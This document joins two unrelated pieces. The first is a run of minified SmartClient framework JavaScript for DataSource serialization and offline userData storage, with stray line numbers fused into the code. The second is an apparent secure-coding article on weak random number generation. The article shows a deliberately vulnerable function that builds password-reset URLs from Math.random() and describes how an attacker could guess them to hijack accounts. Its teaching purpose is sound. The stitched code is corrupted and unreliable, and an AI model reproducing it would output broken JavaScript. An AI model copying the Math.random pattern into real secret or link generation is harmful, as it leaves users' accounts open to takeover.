return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}728return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}729var _5=isc.DataSource.getNearestSchemaClass(this),_6;if(_5&&_5._stringMethodRegistry&&_5._stringMethodRegistry[_1]!==_6)730{return isc.StringMethod.create({value:_2})}},isc.A.$378=function isc_DataSource__handleXMLReply(_1,_2,_3,_4){var _5=_1,_6=_4._dsRequest,_7=this.getOperationBinding(_6),_8;if(_3.status<0){var _9=_2||_3.data;this.$38b(_9,{status:_3.status,data:_9},_6,_3,_4);return}


2481this.keyIndex={};this.reverseKeyIndex={};this.saveKeyIndex()},getNativeStoredValuesCount:function(){var count=0;for(var i=0;i<this.poolSize;i++){count+=this.userDataSpan[i].xmlDocument.firstChild.attributes.length}2482return count},getKeyForNativeIndex:function(index){var iCounter=0;for(var i=0;i<this.poolSize;i++){if(iCounter+this.userDataSpan[i].xmlDocument.firstChild.attributes.length>index){var offsetIndex=index-iCounter;var attrName=this.userDataSpan[i].xmlDocument.firstChild.attributes[offsetIndex].name,attrNum=attrName.substring(1),dsKey=this.getKeyIndexValue(i,attrNum);return this.getUserKey(dsKey)}}},getKeyIndexValue:function(index,attrName){var attrNum=attrName.substring(1);if(index==0){return"00000".substring(attrNum.length)+attrNum}2483return index*10000+(1*attrNum)},getUserKey:function(userKey){return this.reverseKeyIndex[userKey]},getDataStoreKey:function(key){return this.keyIndex[key]},$70p:function(dataStore,attr){return this.userDataSpan[dataStore].getAttribute(attr)},getValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef)return null;var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);return this.$70p(dataStore,attr)},putValue:function(userKey,value){var key=this.getDataStoreKey(userKey);if(key){var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1),savedValue=this.$70p(dataStore,attr)}else{var dataStore=this.getDataStoreForNewItem(),attr=this.getNextAttributeName(dataStore)}2484this.userDataSpan[dataStore].setAttribute(attr,value);try{this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.addToKeyIndex(userKey,dataStore,attr)}catch(e){if(isc.Offline.isStorageException(e)){if(savedValue){this.userDataSpan[dataStore].setAttribute(attr,savedValue)}else{this.userDataSpan[dataStore].removeAttribute(attr);this.removeFromKeyIndex(userKey)}}2485throw e}},removeValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef){Offline.logDebug("userData: in removeValue, no value for key '"+userKey+"' was found");return}2486var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);this.userDataSpan[dataStore].removeAttribute(attr);this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.removeFromKeyIndex(userKey);this.unusedAttributeNumbers[dataStore].push(attr.substring(1)*1)},getDataStoreForNewItem:function(){var undef;if(this.nextDataStoreToUse===undef){this.nextDataStoreToUse=Math.floor(Math.random()*this.poolSize)}2487var rtnValue=this.nextDataStoreToUse++;if(this.nextDataStoreToUse>=this.poolSize)this.nextDataStoreToUse=0;return rtnValue},buildNextAttributeInfo:function(){this.nextAttributeNumber=[];this.unusedAttributeNumbers=[];for(var i=0;i<this.poolSize;i++){this.unusedAttributeNumbers[i]=[];var attrs=this.userDataSpan[i].xmlDocument.firstChild.attributes;var work=[];for(var j=0;j<attrs.length;j++){var num=attrs[j].name.substring(1)*1;if(!isNaN(num))work.add(attrs[j].name.substring(1)*1)}2488if(work.sort)work.sort();else this.sort(work);var counter=0;for(j=0;j<work.length;j++){if(work[j]==counter){counter++;continue}2489while(work[j]!=counter&&counter<=9999){this.unusedAttributeNumbers[i].push(counter++)}2490counter++}2491this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}


Using Insufficiently Random Generators in Cryptography

Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.

Example

Let’s take a look at a function that randomly generates a URL to a page:

JavaScriptfunction generateReceiptURL(baseUrl) {return(baseUrl + Math.random() + '.html');}

This method can be used to process a user request to edit account settings. The user sends a password change request, the system sends a link to a generated page to the user’s email address, and the user accesses the password change form on it.

The link to the page is generated based on a random string of characters received as the output of the call to the Math.random()method [1]. This method generates predictable pseudorandom numbers, and if the malicious user finds out that this method is used, he can easily guess the value of the link.

The malicious user can then send a password reset request in the victim’s name, and drop the current password. This lets him steal the victim’s account without first gaining access to it.

Potential consequences•

If the random numbers are used for defense mechanisms, such as session ID generation or crypto keys, predictable values seriously compromise security. The malicious user can predict the generated value, and get the key value, and gain access to the protected resource.

•If the application uses a random value to generate some resource ID, and the value is easily predictable, the malicious user can access the resource, or replace it with his own copy with a backdoor in it.

•If the authorization and authentication mechanisms are based on using random numbers (such as secret key generation), the malicious user can guess the key value and access protected system modules.


Pseudorandom generators are split into static and cryptographic. We recommend using cryptographic generators, since they generate a pseudorandom sequence that is difficult to predict.

•Currently, JavaScript realizes a cryptographic random number generator: the RandomSource [2] interface.

•We recommend looking into using random number generators that use physical models for the generation process, such as atmospheric noise.